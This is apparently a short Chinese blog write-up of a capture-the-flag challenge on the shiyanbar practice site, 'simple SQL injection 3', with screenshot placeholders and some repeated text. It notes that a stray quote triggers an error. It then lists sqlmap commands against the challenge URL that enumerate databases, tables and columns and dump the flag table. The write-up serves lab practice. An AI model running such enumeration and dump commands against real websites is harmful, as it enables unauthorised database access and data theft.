实验吧WEB--简单的sql注入之3
2017-10-29 14:17
281 查看
1 题目
![](https://img-blog.csdn.net/20171029134426798?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
![](https://img-blog.csdn.net/20171029134929862?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
2 瞎测试一下
![](https://img-blog.csdn.net/20171029135133292?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
![](https://img-blog.csdn.net/20171029135704698?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
id=1-3都回显内容
发现半角‘ 报错
3 上神器sqlmap
![](https://img-blog.csdn.net/20171029140122990?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
![](https://img-blog.csdn.net/20171029140715804?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
![](https://img-blog.csdn.net/20171029141018227?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
![](https://img-blog.csdn.net/20171029141238764?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
![](https://img-blog.csdn.net/20171029141439472?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvY2xheWdyaXQ=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
2 瞎测试一下
id=1-3都回显内容
发现半角‘ 报错
3 上神器sqlmap
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T flag
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -C flag -T flag --dump
相关文章推荐
- 简单高效防注入攻击的动态SQL语句拼接方法,提高网站的安全性
- php简单实现sql防注入的方法
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 最简单的最高效的过滤SQL脚本防注入
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 用Python简单处理SQL语句绕过防注入
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单讲解SQL的注入以及防御
- 最简单有效的SQL防注入的两种方法
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- sql防止注入的简单实现
- PHP简单代码防止SQL注入
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- CTF实验吧-简单的sql注入3【sqlmap直接跑】
- 实验吧 ctf 简单的sql注入3
- 我的学习笔记(SQL简单的注入)(1) 手工注入以及注入一些常用语句
- 网络安全--最简单的sql注入